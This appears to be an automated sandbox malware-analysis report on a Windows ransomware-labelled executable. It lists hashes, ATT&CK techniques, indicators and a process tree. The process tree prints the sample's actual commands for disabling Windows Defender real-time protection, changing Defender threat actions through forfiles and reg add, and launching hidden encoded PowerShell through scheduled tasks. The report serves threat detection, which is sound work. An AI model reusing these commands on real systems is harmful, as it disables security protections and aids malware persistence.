b9026fce43a810a6a6b216a2cf6d9a39e9cf265caac3b8c46de3a1bdef8a606d

Analysis

max time kernel
109s
max time network
111s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
24-05-2024 16:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
Size

6.7MB
MD5

f793b0bdfb3c06ba932dddffb5be9ad8
SHA1

b17c6d562c371f8140432354b4304ac4d03fe41f
SHA256

b9026fce43a810a6a6b216a2cf6d9a39e9cf265caac3b8c46de3a1bdef8a606d
SHA512

e587a085e39d6691b7ee55fda9581dd14fb175a619d5613a1370a5ae4bc661dfd8c6cbc82dbffb75787eb228778b88a8feddd1a9df83540ace73cbd15cf0d501
SSDEEP

196608:chjvlx3/aPRLJ5uuC49qd3rGC03XhzuxktD0:cdvb/wRLauu5GCWoxktD

Score

10^/10

discovery evasion execution spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe

Windows security bypass 2 TTPs 30 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\boSLTBXAavlTIcMXJ = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dkHlCbgnIThowMMU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\EkAcBLsehYBU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LjPBjCkxU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dkHlCbgnIThowMMU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WEPOREuymMJJC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yyjtaGBLEqUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\PtxASTBQXXYOENVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.EXEpowershell.EXEpowershell.exepowershell.EXEpowershell.exe

pid process

1548 powershell.EXE
2644 powershell.EXE
2228 powershell.exe
2848 powershell.EXE
2472 powershell.exe

pid	process
1548	powershell.EXE
2644	powershell.EXE
2228	powershell.exe
2848	powershell.EXE
2472	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Control Panel\International\Geo\Nation	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

Processes:

2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gimgggabfigedfmidfhmgaaccgefdfnj\1.0_0\manifest.json	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

Drops file in System32 directory 9 IoCs

Processes:

powershell.EXE2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exepowershell.EXEpowershell.exepowershell.exepowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Drops file in Program Files directory 13 IoCs

Processes:

2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

description	ioc	process
File created	C:\Program Files\Mozilla Firefox\browser\features\{9A9F9ACC-B19C-4B66-8FE8-814016970733}.xpi	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files (x86)\LjPBjCkxU\iXGGmtk.xml	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files (x86)\EkAcBLsehYBU2\dvdQTlLWiBRXg.dll	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR\mEOyqyi.dll	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files (x86)\yyjtaGBLEqUn\xbiuorQ.dll	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files (x86)\LjPBjCkxU\vQlWBX.dll	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files (x86)\EkAcBLsehYBU2\nTMNVQy.xml	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files (x86)\WEPOREuymMJJC\PfTTFbJ.dll	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files (x86)\WEPOREuymMJJC\EwEvpwW.xml	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{9A9F9ACC-B19C-4B66-8FE8-814016970733}.xpi	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR\PjAmsXW.xml	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\RqexYqdylWmHLyb.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1508 2664 WerFault.exe 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

description	ioc	process
File created	C:\Windows\Tasks\RqexYqdylWmHLyb.job	schtasks.exe

pid	pid_target	process	target process
1508	2664	WerFault.exe	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2756	schtasks.exe
3004	schtasks.exe
1720	schtasks.exe
2272	schtasks.exe
1752	schtasks.exe
2224	schtasks.exe
1916	schtasks.exe
1108	schtasks.exe
692	schtasks.exe

Suspicious behavior: EnumeratesProcesses 42 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXE2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

pid	process
2472	powershell.exe
2472	powershell.exe
2472	powershell.exe
1548	powershell.EXE
1548	powershell.EXE
1548	powershell.EXE
2644	powershell.EXE
2644	powershell.EXE
2644	powershell.EXE
2228	powershell.exe
2848	powershell.EXE
2848	powershell.EXE
2848	powershell.EXE
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exeWMIC.exepowershell.EXE

description	pid	process
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	1548	powershell.EXE
Token: SeDebugPrivilege	2644	powershell.EXE
Token: SeDebugPrivilege	2228	powershell.exe
Token: SeIncreaseQuotaPrivilege	1676	WMIC.exe
Token: SeSecurityPrivilege	1676	WMIC.exe
Token: SeTakeOwnershipPrivilege	1676	WMIC.exe
Token: SeLoadDriverPrivilege	1676	WMIC.exe
Token: SeSystemProfilePrivilege	1676	WMIC.exe
Token: SeSystemtimePrivilege	1676	WMIC.exe
Token: SeProfSingleProcessPrivilege	1676	WMIC.exe
Token: SeIncBasePriorityPrivilege	1676	WMIC.exe
Token: SeCreatePagefilePrivilege	1676	WMIC.exe
Token: SeBackupPrivilege	1676	WMIC.exe
Token: SeRestorePrivilege	1676	WMIC.exe
Token: SeShutdownPrivilege	1676	WMIC.exe
Token: SeDebugPrivilege	1676	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1676	WMIC.exe
Token: SeRemoteShutdownPrivilege	1676	WMIC.exe
Token: SeUndockPrivilege	1676	WMIC.exe
Token: SeManageVolumePrivilege	1676	WMIC.exe
Token: 33	1676	WMIC.exe
Token: 34	1676	WMIC.exe
Token: 35	1676	WMIC.exe
Token: SeDebugPrivilege	2848	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exe

description	pid	process	target process
PID 2664 wrote to memory of 2092	2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe	cmd.exe
PID 2664 wrote to memory of 2092	2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe	cmd.exe
PID 2664 wrote to memory of 2092	2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe	cmd.exe
PID 2664 wrote to memory of 2092	2664	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe	cmd.exe
PID 2092 wrote to memory of 1200	2092	cmd.exe	forfiles.exe
PID 2092 wrote to memory of 1200	2092	cmd.exe	forfiles.exe
PID 2092 wrote to memory of 1200	2092	cmd.exe	forfiles.exe
PID 2092 wrote to memory of 1200	2092	cmd.exe	forfiles.exe
PID 1200 wrote to memory of 2476	1200	forfiles.exe	cmd.exe
PID 1200 wrote to memory of 2476	1200	forfiles.exe	cmd.exe
PID 1200 wrote to memory of 2476	1200	forfiles.exe	cmd.exe
PID 1200 wrote to memory of 2476	1200	forfiles.exe	cmd.exe
PID 2476 wrote to memory of 2676	2476	cmd.exe	reg.exe
PID 2476 wrote to memory of 2676	2476	cmd.exe	reg.exe
PID 2476 wrote to memory of 2676	2476	cmd.exe	reg.exe
PID 2476 wrote to memory of 2676	2476	cmd.exe	reg.exe
PID 2092 wrote to memory of 2532	2092	cmd.exe	forfiles.exe
PID 2092 wrote to memory of 2532	2092	cmd.exe	forfiles.exe
PID 2092 wrote to memory of 2532	2092	cmd.exe	forfiles.exe
PID 2092 wrote to memory of 2532	2092	cmd.exe	forfiles.exe
PID 2532 wrote to memory of 2548	2532	forfiles.exe	cmd.exe
PID 2532 wrote to memory of 2548	2532	forfiles.exe	cmd.exe
PID 2532 wrote to memory of 2548	2532	forfiles.exe	cmd.exe
PID 2532 wrote to memory of 2548	2532	forfiles.exe	cmd.exe
PID 2548 wrote to memory of 2552	2548	cmd.exe	reg.exe
PID 2548 wrote to memory of 2552	2548	cmd.exe	reg.exe
PID 2548 wrote to memory of 2552	2548	cmd.exe	reg.exe
PID 2548 wrote to memory of 2552	2548	cmd.exe	reg.exe
PID 2092 wrote to memory of 2564	2092	cmd.exe	forfiles.exe
PID 2092 wrote to memory of 2564	2092	cmd.exe	forfiles.exe
PID 2092 wrote to memory of 2564	2092	cmd.exe	forfiles.exe
PID 2092 wrote to memory of 2564	2092	cmd.exe	forfiles.exe
PID 2564 wrote to memory of 2672	2564	forfiles.exe	cmd.exe
PID 2564 wrote to memory of 2672	2564	forfiles.exe	cmd.exe
PID 2564 wrote to memory of 2672	2564	forfiles.exe	cmd.exe
PID 2564 wrote to memory of 2672	2564	forfiles.exe	cmd.exe
PID 2672 wrote to memory of 2368	2672	cmd.exe	reg.exe
PID 2672 wrote to memory of 2368	2672	cmd.exe	reg.exe
PID 2672 wrote to memory of 2368	2672	cmd.exe	reg.exe
PID 2672 wrote to memory of 2368	2672	cmd.exe	reg.exe
PID 2092 wrote to memory of 2596	2092	cmd.exe	forfiles.exe
PID 2092 wrote to memory of 2596	2092	cmd.exe	forfiles.exe
PID 2092 wrote to memory of 2596	2092	cmd.exe	forfiles.exe
PID 2092 wrote to memory of 2596	2092	cmd.exe	forfiles.exe
PID 2596 wrote to memory of 2436	2596	forfiles.exe	cmd.exe
PID 2596 wrote to memory of 2436	2596	forfiles.exe	cmd.exe
PID 2596 wrote to memory of 2436	2596	forfiles.exe	cmd.exe
PID 2596 wrote to memory of 2436	2596	forfiles.exe	cmd.exe
PID 2436 wrote to memory of 2356	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 2356	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 2356	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 2356	2436	cmd.exe	reg.exe
PID 2092 wrote to memory of 2788	2092	cmd.exe	forfiles.exe
PID 2092 wrote to memory of 2788	2092	cmd.exe	forfiles.exe
PID 2092 wrote to memory of 2788	2092	cmd.exe	forfiles.exe
PID 2092 wrote to memory of 2788	2092	cmd.exe	forfiles.exe
PID 2788 wrote to memory of 2360	2788	forfiles.exe	cmd.exe
PID 2788 wrote to memory of 2360	2788	forfiles.exe	cmd.exe
PID 2788 wrote to memory of 2360	2788	forfiles.exe	cmd.exe
PID 2788 wrote to memory of 2360	2788	forfiles.exe	cmd.exe
PID 2360 wrote to memory of 2472	2360	cmd.exe	powershell.exe
PID 2360 wrote to memory of 2472	2360	cmd.exe	powershell.exe
PID 2360 wrote to memory of 2472	2360	cmd.exe	powershell.exe
PID 2360 wrote to memory of 2472	2360	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
"C:\Users\Admin\AppData\Local\Temp\2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe"
1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2664

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2⤵
- Suspicious use of WriteProcessMemory
PID:2092

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:1200

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:2476

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:2676

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:2532

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:2548

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:2552

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:2564

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:2672

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:2368

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:2596

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:2436

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:2356

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
- Suspicious use of WriteProcessMemory
PID:2788

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
4⤵
- Suspicious use of WriteProcessMemory
PID:2360

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2472

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
6⤵
PID:2344

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gnMrBRaWy" /SC once /ST 02:14:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:2756

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gnMrBRaWy"
2⤵
PID:1912

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gnMrBRaWy"
2⤵
PID:996

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
2⤵
PID:1884

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1704

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
2⤵
PID:1544

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2128

